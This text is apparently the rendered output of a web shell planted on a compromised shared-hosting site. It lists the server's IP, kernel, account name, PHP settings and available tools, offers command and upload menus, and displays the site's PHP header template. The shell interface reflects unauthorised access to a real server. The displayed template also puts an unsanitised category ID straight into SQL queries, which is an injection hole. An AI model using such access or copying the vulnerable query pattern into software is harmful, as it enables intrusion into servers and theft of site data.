Server IP : 103.53.40.154 / Your IP : 18.188.76.209 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/vermaborewell.co.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<section class="inner-header divider layer-overlay overlay-dark" data-bg-img="<?=$site_url."/uploaded_files/".db_scalar("select header_flash_image_name from tbl_header_flash WHERE header_flash_type='Inner'")?>"> <div class="container pt-30 pb-30"> <!-- Section Content --> <div class="section-content text-center"> <div class="row"> <?php if(!empty($catgoryID)){?> <div class="col-md-6 col-md-offset-3 text-center"> <h2 class="text-theme-colored font-36"><?=db_scalar("select category_name from tbl_category where category_status='Active' and category_id='$catgoryID'")?></h2> <ol class="breadcrumb text-center mt-10 white"> <li><a href="<?=$site_url?>/index.html">Home</a></li> <li class="active"><?=db_scalar("select category_name from tbl_category where category_status='Active' and category_id='$catgoryID'")?></li> </ol> </div> <?php }else{?> <div class="col-md-6 col-md-offset-3 text-center"> <h2 class="text-theme-colored font-36"><?=ucwords(strtolower($pgHeading));?></h2> <ol class="breadcrumb text-center mt-10 white"> <li><a href="<?=$site_url?>/index.html">Home</a></li> <li class="active"><?=ucwords(strtolower($pgHeading));?></li> </ol> </div> <?php }?> </div> </div> </div> </section>